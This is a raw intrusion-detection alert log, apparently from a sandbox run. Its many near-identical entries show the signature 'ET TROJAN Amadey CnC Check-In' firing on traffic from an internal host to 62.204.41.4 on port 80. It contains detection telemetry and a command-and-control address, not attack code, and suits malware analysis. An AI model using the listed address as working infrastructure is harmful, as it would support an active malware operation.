192.168.2.562.204.41.450238802027700 02/07/23-19:59:32.939539	TCP	2027700	ET TROJAN Amadey CnC Check-In	50238	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450149802027700 02/07/23-19:59:08.801458	TCP	2027700	ET TROJAN Amadey CnC Check-In	50149	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449708802027700 02/07/23-19:57:08.619164	TCP	2027700	ET TROJAN Amadey CnC Check-In	49708	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450250802027700 02/07/23-19:59:35.782201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50250	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450253802027700 02/07/23-19:59:36.518712	TCP	2027700	ET TROJAN Amadey CnC Check-In	50253	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450327802027700 02/07/23-19:59:56.530972	TCP	2027700	ET TROJAN Amadey CnC Check-In	50327	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450416802027700 02/07/23-20:00:22.006473	TCP	2027700	ET TROJAN Amadey CnC Check-In	50416	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450342802027700 02/07/23-20:00:00.462429	TCP	2027700	ET TROJAN Amadey CnC Check-In	50342	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450161802027700 02/07/23-19:59:11.700306	TCP	2027700	ET TROJAN Amadey CnC Check-In	50161	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450431802027700 02/07/23-20:00:25.972242	TCP	2027700	ET TROJAN Amadey CnC Check-In	50431	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450291802027700 02/07/23-19:59:47.841889	TCP	2027700	ET TROJAN Amadey CnC Check-In	50291	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450294802027700 02/07/23-19:59:48.563161	TCP	2027700	ET TROJAN Amadey CnC Check-In	50294	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449891802027700 02/07/23-19:57:56.954067	TCP	2027700	ET TROJAN Amadey CnC Check-In	49891	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450075802027700 02/07/23-19:58:48.119366	TCP	2027700	ET TROJAN Amadey CnC Check-In	50075	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450164802027700 02/07/23-19:59:12.434295	TCP	2027700	ET TROJAN Amadey CnC Check-In	50164	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449914802027700 02/07/23-19:58:02.515565	TCP	2027700	ET TROJAN Amadey CnC Check-In	49914	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449980802027700 02/07/23-19:58:20.421307	TCP	2027700	ET TROJAN Amadey CnC Check-In	49980	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449850802027700 02/07/23-19:57:44.320306	TCP	2027700	ET TROJAN Amadey CnC Check-In	49850	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450225802027700 02/07/23-19:59:29.829004	TCP	2027700	ET TROJAN Amadey CnC Check-In	50225	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450355802027700 02/07/23-20:00:05.610275	TCP	2027700	ET TROJAN Amadey CnC Check-In	50355	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449736802027700 02/07/23-19:57:14.683730	TCP	2027700	ET TROJAN Amadey CnC Check-In	49736	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449866802027700 02/07/23-19:57:51.087084	TCP	2027700	ET TROJAN Amadey CnC Check-In	49866	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449825802027700 02/07/23-19:57:37.561460	TCP	2027700	ET TROJAN Amadey CnC Check-In	49825	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449996802027700 02/07/23-19:58:26.579679	TCP	2027700	ET TROJAN Amadey CnC Check-In	49996	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450006802027700 02/07/23-19:58:29.008274	TCP	2027700	ET TROJAN Amadey CnC Check-In	50006	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449955802027700 02/07/23-19:58:14.419186	TCP	2027700	ET TROJAN Amadey CnC Check-In	49955	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450136802027700 02/07/23-19:59:05.899724	TCP	2027700	ET TROJAN Amadey CnC Check-In	50136	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449777802027700 02/07/23-19:57:23.720957	TCP	2027700	ET TROJAN Amadey CnC Check-In	49777	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450266802027700 02/07/23-19:59:39.687644	TCP	2027700	ET TROJAN Amadey CnC Check-In	50266	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450396802027700 02/07/23-20:00:15.510798	TCP	2027700	ET TROJAN Amadey CnC Check-In	50396	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450314802027700 02/07/23-19:59:53.406803	TCP	2027700	ET TROJAN Amadey CnC Check-In	50314	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450444802027700 02/07/23-20:00:29.095831	TCP	2027700	ET TROJAN Amadey CnC Check-In	50444	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450403802027700 02/07/23-20:00:17.175192	TCP	2027700	ET TROJAN Amadey CnC Check-In	50403	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450059802027700 02/07/23-19:58:41.853764	TCP	2027700	ET TROJAN Amadey CnC Check-In	50059	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450157802027700 02/07/23-19:59:10.761628	TCP	2027700	ET TROJAN Amadey CnC Check-In	50157	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450062802027700 02/07/23-19:58:42.938578	TCP	2027700	ET TROJAN Amadey CnC Check-In	50062	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449829802027700 02/07/23-19:57:38.585640	TCP	2027700	ET TROJAN Amadey CnC Check-In	49829	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449927802027700 02/07/23-19:58:07.969609	TCP	2027700	ET TROJAN Amadey CnC Check-In	49927	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449832802027700 02/07/23-19:57:39.308335	TCP	2027700	ET TROJAN Amadey CnC Check-In	49832	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450160802027700 02/07/23-19:59:11.468507	TCP	2027700	ET TROJAN Amadey CnC Check-In	50160	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449734802027700 02/07/23-19:57:14.182238	TCP	2027700	ET TROJAN Amadey CnC Check-In	49734	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450451802027700 02/07/23-20:00:30.804845	TCP	2027700	ET TROJAN Amadey CnC Check-In	50451	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450001802027700 02/07/23-19:58:27.747122	TCP	2027700	ET TROJAN Amadey CnC Check-In	50001	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450255802027700 02/07/23-19:59:37.003438	TCP	2027700	ET TROJAN Amadey CnC Check-In	50255	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450353802027700 02/07/23-20:00:05.126188	TCP	2027700	ET TROJAN Amadey CnC Check-In	50353	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449930802027700 02/07/23-19:58:08.681863	TCP	2027700	ET TROJAN Amadey CnC Check-In	49930	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449988802027700 02/07/23-19:58:22.324290	TCP	2027700	ET TROJAN Amadey CnC Check-In	49988	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449762802027700 02/07/23-19:57:20.088453	TCP	2027700	ET TROJAN Amadey CnC Check-In	49762	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450090802027700 02/07/23-19:58:51.779336	TCP	2027700	ET TROJAN Amadey CnC Check-In	50090	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449860802027700 02/07/23-19:57:49.596112	TCP	2027700	ET TROJAN Amadey CnC Check-In	49860	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450095802027700 02/07/23-19:58:53.020938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50095	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450448802027700 02/07/23-20:00:30.077914	TCP	2027700	ET TROJAN Amadey CnC Check-In	50448	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449963802027700 02/07/23-19:58:16.325115	TCP	2027700	ET TROJAN Amadey CnC Check-In	49963	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450423802027700 02/07/23-20:00:24.067700	TCP	2027700	ET TROJAN Amadey CnC Check-In	50423	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449804802027700 02/07/23-19:57:32.699147	TCP	2027700	ET TROJAN Amadey CnC Check-In	49804	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450386802027700 02/07/23-20:00:13.098003	TCP	2027700	ET TROJAN Amadey CnC Check-In	50386	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450132802027700 02/07/23-19:59:02.326823	TCP	2027700	ET TROJAN Amadey CnC Check-In	50132	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449770802027700 02/07/23-19:57:21.824482	TCP	2027700	ET TROJAN Amadey CnC Check-In	49770	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449983802027700 02/07/23-19:58:21.153208	TCP	2027700	ET TROJAN Amadey CnC Check-In	49983	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450227802027700 02/07/23-19:59:30.297316	TCP	2027700	ET TROJAN Amadey CnC Check-In	50227	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450222802027700 02/07/23-19:59:29.105694	TCP	2027700	ET TROJAN Amadey CnC Check-In	50222	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449739802027700 02/07/23-19:57:15.413161	TCP	2027700	ET TROJAN Amadey CnC Check-In	49739	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450185802027700 02/07/23-19:59:17.468502	TCP	2027700	ET TROJAN Amadey CnC Check-In	50185	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450381802027700 02/07/23-20:00:11.899082	TCP	2027700	ET TROJAN Amadey CnC Check-In	50381	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449898802027700 02/07/23-19:57:58.651415	TCP	2027700	ET TROJAN Amadey CnC Check-In	49898	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450317802027700 02/07/23-19:59:54.125434	TCP	2027700	ET TROJAN Amadey CnC Check-In	50317	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450104802027700 02/07/23-19:58:55.183792	TCP	2027700	ET TROJAN Amadey CnC Check-In	50104	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450358802027700 02/07/23-20:00:06.314097	TCP	2027700	ET TROJAN Amadey CnC Check-In	50358	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449857802027700 02/07/23-19:57:48.874538	TCP	2027700	ET TROJAN Amadey CnC Check-In	49857	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449893802027700 02/07/23-19:57:57.434157	TCP	2027700	ET TROJAN Amadey CnC Check-In	49893	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449935802027700 02/07/23-19:58:09.870706	TCP	2027700	ET TROJAN Amadey CnC Check-In	49935	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449697802027700 02/07/23-19:57:03.625893	TCP	2027700	ET TROJAN Amadey CnC Check-In	49697	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450026802027700 02/07/23-19:58:34.056162	TCP	2027700	ET TROJAN Amadey CnC Check-In	50026	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450067802027700 02/07/23-19:58:46.185179	TCP	2027700	ET TROJAN Amadey CnC Check-In	50067	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450263802027700 02/07/23-19:59:38.967068	TCP	2027700	ET TROJAN Amadey CnC Check-In	50263	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450373802027700 02/07/23-20:00:09.942649	TCP	2027700	ET TROJAN Amadey CnC Check-In	50373	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449754802027700 02/07/23-19:57:18.680477	TCP	2027700	ET TROJAN Amadey CnC Check-In	49754	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449852802027700 02/07/23-19:57:46.015163	TCP	2027700	ET TROJAN Amadey CnC Check-In	49852	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450082802027700 02/07/23-19:58:49.824851	TCP	2027700	ET TROJAN Amadey CnC Check-In	50082	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450410802027700 02/07/23-20:00:18.845590	TCP	2027700	ET TROJAN Amadey CnC Check-In	50410	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449840802027700 02/07/23-19:57:41.244153	TCP	2027700	ET TROJAN Amadey CnC Check-In	49840	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450079802027700 02/07/23-19:58:49.105142	TCP	2027700	ET TROJAN Amadey CnC Check-In	50079	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450202802027700 02/07/23-19:59:21.791441	TCP	2027700	ET TROJAN Amadey CnC Check-In	50202	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450300802027700 02/07/23-19:59:50.001268	TCP	2027700	ET TROJAN Amadey CnC Check-In	50300	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450018802027700 02/07/23-19:58:32.051728	TCP	2027700	ET TROJAN Amadey CnC Check-In	50018	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450198802027700 02/07/23-19:59:20.390515	TCP	2027700	ET TROJAN Amadey CnC Check-In	50198	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450116802027700 02/07/23-19:58:58.086949	TCP	2027700	ET TROJAN Amadey CnC Check-In	50116	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449907802027700 02/07/23-19:58:00.832041	TCP	2027700	ET TROJAN Amadey CnC Check-In	49907	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449787802027700 02/07/23-19:57:28.606188	TCP	2027700	ET TROJAN Amadey CnC Check-In	49787	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450428802027700 02/07/23-20:00:25.267783	TCP	2027700	ET TROJAN Amadey CnC Check-In	50428	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449910802027700 02/07/23-19:58:01.546921	TCP	2027700	ET TROJAN Amadey CnC Check-In	49910	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450345802027700 02/07/23-20:00:01.959618	TCP	2027700	ET TROJAN Amadey CnC Check-In	50345	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449782802027700 02/07/23-19:57:25.569842	TCP	2027700	ET TROJAN Amadey CnC Check-In	49782	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449824802027700 02/07/23-19:57:37.320314	TCP	2027700	ET TROJAN Amadey CnC Check-In	49824	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450152802027700 02/07/23-19:59:09.531894	TCP	2027700	ET TROJAN Amadey CnC Check-In	50152	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449809802027700 02/07/23-19:57:33.899731	TCP	2027700	ET TROJAN Amadey CnC Check-In	49809	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450235802027700 02/07/23-19:59:32.185122	TCP	2027700	ET TROJAN Amadey CnC Check-In	50235	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449726802027700 02/07/23-19:57:12.281502	TCP	2027700	ET TROJAN Amadey CnC Check-In	49726	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450054802027700 02/07/23-19:58:40.604509	TCP	2027700	ET TROJAN Amadey CnC Check-In	50054	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450309802027700 02/07/23-19:59:52.188472	TCP	2027700	ET TROJAN Amadey CnC Check-In	50309	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450407802027700 02/07/23-20:00:18.142047	TCP	2027700	ET TROJAN Amadey CnC Check-In	50407	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450137802027700 02/07/23-19:59:06.138198	TCP	2027700	ET TROJAN Amadey CnC Check-In	50137	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449902802027700 02/07/23-19:57:59.605442	TCP	2027700	ET TROJAN Amadey CnC Check-In	49902	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450230802027700 02/07/23-19:59:30.997466	TCP	2027700	ET TROJAN Amadey CnC Check-In	50230	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449865802027700 02/07/23-19:57:50.851457	TCP	2027700	ET TROJAN Amadey CnC Check-In	49865	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449943802027700 02/07/23-19:58:11.590299	TCP	2027700	ET TROJAN Amadey CnC Check-In	49943	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450443802027700 02/07/23-20:00:28.848844	TCP	2027700	ET TROJAN Amadey CnC Check-In	50443	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450271802027700 02/07/23-19:59:41.182547	TCP	2027700	ET TROJAN Amadey CnC Check-In	50271	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449790802027700 02/07/23-19:57:29.323510	TCP	2027700	ET TROJAN Amadey CnC Check-In	49790	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450087802027700 02/07/23-19:58:51.030172	TCP	2027700	ET TROJAN Amadey CnC Check-In	50087	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450129802027700 02/07/23-19:59:01.428744	TCP	2027700	ET TROJAN Amadey CnC Check-In	50129	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450046802027700 02/07/23-19:58:38.668972	TCP	2027700	ET TROJAN Amadey CnC Check-In	50046	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449873802027700 02/07/23-19:57:52.544613	TCP	2027700	ET TROJAN Amadey CnC Check-In	49873	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450415802027700 02/07/23-20:00:21.209012	TCP	2027700	ET TROJAN Amadey CnC Check-In	50415	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449795802027700 02/07/23-19:57:30.522001	TCP	2027700	ET TROJAN Amadey CnC Check-In	49795	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449878802027700 02/07/23-19:57:53.715011	TCP	2027700	ET TROJAN Amadey CnC Check-In	49878	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449837802027700 02/07/23-19:57:40.510394	TCP	2027700	ET TROJAN Amadey CnC Check-In	49837	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450165802027700 02/07/23-19:59:12.675415	TCP	2027700	ET TROJAN Amadey CnC Check-In	50165	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450378802027700 02/07/23-20:00:11.173249	TCP	2027700	ET TROJAN Amadey CnC Check-In	50378	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450124802027700 02/07/23-19:59:00.013175	TCP	2027700	ET TROJAN Amadey CnC Check-In	50124	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450337802027700 02/07/23-19:59:58.938844	TCP	2027700	ET TROJAN Amadey CnC Check-In	50337	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450207802027700 02/07/23-19:59:25.359503	TCP	2027700	ET TROJAN Amadey CnC Check-In	50207	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450341802027700 02/07/23-20:00:00.154878	TCP	2027700	ET TROJAN Amadey CnC Check-In	50341	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449722802027700 02/07/23-19:57:11.275289	TCP	2027700	ET TROJAN Amadey CnC Check-In	49722	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449976802027700 02/07/23-19:58:19.455952	TCP	2027700	ET TROJAN Amadey CnC Check-In	49976	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450436802027700 02/07/23-20:00:27.196537	TCP	2027700	ET TROJAN Amadey CnC Check-In	50436	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450430802027700 02/07/23-20:00:25.739838	TCP	2027700	ET TROJAN Amadey CnC Check-In	50430	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449719802027700 02/07/23-19:57:10.555436	TCP	2027700	ET TROJAN Amadey CnC Check-In	49719	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450338802027700 02/07/23-19:59:59.187277	TCP	2027700	ET TROJAN Amadey CnC Check-In	50338	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450427802027700 02/07/23-20:00:25.032850	TCP	2027700	ET TROJAN Amadey CnC Check-In	50427	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449808802027700 02/07/23-19:57:33.669443	TCP	2027700	ET TROJAN Amadey CnC Check-In	49808	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449906802027700 02/07/23-19:58:00.574287	TCP	2027700	ET TROJAN Amadey CnC Check-In	49906	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449817802027700 02/07/23-19:57:35.876380	TCP	2027700	ET TROJAN Amadey CnC Check-In	49817	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450329802027700 02/07/23-19:59:57.013885	TCP	2027700	ET TROJAN Amadey CnC Check-In	50329	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450074802027700 02/07/23-19:58:47.870199	TCP	2027700	ET TROJAN Amadey CnC Check-In	50074	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449915802027700 02/07/23-19:58:02.781708	TCP	2027700	ET TROJAN Amadey CnC Check-In	49915	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450172802027700 02/07/23-19:59:14.371003	TCP	2027700	ET TROJAN Amadey CnC Check-In	50172	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450013802027700 02/07/23-19:58:30.820175	TCP	2027700	ET TROJAN Amadey CnC Check-In	50013	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450270802027700 02/07/23-19:59:40.657861	TCP	2027700	ET TROJAN Amadey CnC Check-In	50270	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449948802027700 02/07/23-19:58:12.777625	TCP	2027700	ET TROJAN Amadey CnC Check-In	49948	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450083802027700 02/07/23-19:58:50.074970	TCP	2027700	ET TROJAN Amadey CnC Check-In	50083	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450402802027700 02/07/23-20:00:16.938938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50402	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450169802027700 02/07/23-19:59:13.653163	TCP	2027700	ET TROJAN Amadey CnC Check-In	50169	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449750802027700 02/07/23-19:57:18.108794	TCP	2027700	ET TROJAN Amadey CnC Check-In	49750	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450267802027700 02/07/23-19:59:39.920444	TCP	2027700	ET TROJAN Amadey CnC Check-In	50267	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449741802027700 02/07/23-19:57:15.910290	TCP	2027700	ET TROJAN Amadey CnC Check-In	49741	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450178802027700 02/07/23-19:59:15.810186	TCP	2027700	ET TROJAN Amadey CnC Check-In	50178	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450109802027700 02/07/23-19:58:56.416170	TCP	2027700	ET TROJAN Amadey CnC Check-In	50109	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450103802027700 02/07/23-19:58:54.948416	TCP	2027700	ET TROJAN Amadey CnC Check-In	50103	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450268802027700 02/07/23-19:59:40.160557	TCP	2027700	ET TROJAN Amadey CnC Check-In	50268	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450357802027700 02/07/23-20:00:06.081116	TCP	2027700	ET TROJAN Amadey CnC Check-In	50357	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449779802027700 02/07/23-19:57:24.309471	TCP	2027700	ET TROJAN Amadey CnC Check-In	49779	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449934802027700 02/07/23-19:58:09.625815	TCP	2027700	ET TROJAN Amadey CnC Check-In	49934	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449738802027700 02/07/23-19:57:15.178369	TCP	2027700	ET TROJAN Amadey CnC Check-In	49738	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450014802027700 02/07/23-19:58:31.062717	TCP	2027700	ET TROJAN Amadey CnC Check-In	50014	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449975802027700 02/07/23-19:58:19.199653	TCP	2027700	ET TROJAN Amadey CnC Check-In	49975	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450210802027700 02/07/23-19:59:26.169613	TCP	2027700	ET TROJAN Amadey CnC Check-In	50210	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450411802027700 02/07/23-20:00:19.306270	TCP	2027700	ET TROJAN Amadey CnC Check-In	50411	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450464802027700 02/07/23-20:00:33.699108	TCP	2027700	ET TROJAN Amadey CnC Check-In	50464	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450055802027700 02/07/23-19:58:40.841197	TCP	2027700	ET TROJAN Amadey CnC Check-In	50055	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450144802027700 02/07/23-19:59:07.591286	TCP	2027700	ET TROJAN Amadey CnC Check-In	50144	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450181802027700 02/07/23-19:59:16.514939	TCP	2027700	ET TROJAN Amadey CnC Check-In	50181	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450340802027700 02/07/23-19:59:59.670957	TCP	2027700	ET TROJAN Amadey CnC Check-In	50340	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449721802027700 02/07/23-19:57:11.038423	TCP	2027700	ET TROJAN Amadey CnC Check-In	49721	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449886802027700 02/07/23-19:57:55.680683	TCP	2027700	ET TROJAN Amadey CnC Check-In	49886	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450398802027700 02/07/23-20:00:15.996201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50398	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449845802027700 02/07/23-19:57:42.455705	TCP	2027700	ET TROJAN Amadey CnC Check-In	49845	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450251802027700 02/07/23-19:59:36.032976	TCP	2027700	ET TROJAN Amadey CnC Check-In	50251	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450197802027700 02/07/23-19:59:20.137780	TCP	2027700	ET TROJAN Amadey CnC Check-In	50197	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450239802027700 02/07/23-19:59:33.185655	TCP	2027700	ET TROJAN Amadey CnC Check-In	50239	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449811802027700 02/07/23-19:57:34.389822	TCP	2027700	ET TROJAN Amadey CnC Check-In	49811	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450379802027700 02/07/23-20:00:11.418266	TCP	2027700	ET TROJAN Amadey CnC Check-In	50379	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449947802027700 02/07/23-19:58:12.542504	TCP	2027700	ET TROJAN Amadey CnC Check-In	49947	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450214802027700 02/07/23-19:59:27.169597	TCP	2027700	ET TROJAN Amadey CnC Check-In	50214	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450128802027700 02/07/23-19:59:00.987231	TCP	2027700	ET TROJAN Amadey CnC Check-In	50128	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450312802027700 02/07/23-19:59:52.924013	TCP	2027700	ET TROJAN Amadey CnC Check-In	50312	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450468802027700 02/07/23-20:00:34.647098	TCP	2027700	ET TROJAN Amadey CnC Check-In	50468	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450125802027700 02/07/23-19:59:00.262200	TCP	2027700	ET TROJAN Amadey CnC Check-In	50125	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450223802027700 02/07/23-19:59:29.342199	TCP	2027700	ET TROJAN Amadey CnC Check-In	50223	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449864802027700 02/07/23-19:57:50.603717	TCP	2027700	ET TROJAN Amadey CnC Check-In	49864	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450131802027700 02/07/23-19:59:02.039230	TCP	2027700	ET TROJAN Amadey CnC Check-In	50131	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450385802027700 02/07/23-20:00:12.863067	TCP	2027700	ET TROJAN Amadey CnC Check-In	50385	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449766802027700 02/07/23-19:57:21.096100	TCP	2027700	ET TROJAN Amadey CnC Check-In	49766	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450070802027700 02/07/23-19:58:46.903603	TCP	2027700	ET TROJAN Amadey CnC Check-In	50070	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449849802027700 02/07/23-19:57:43.984219	TCP	2027700	ET TROJAN Amadey CnC Check-In	49849	80	192.168.2.5	62.204.41.4
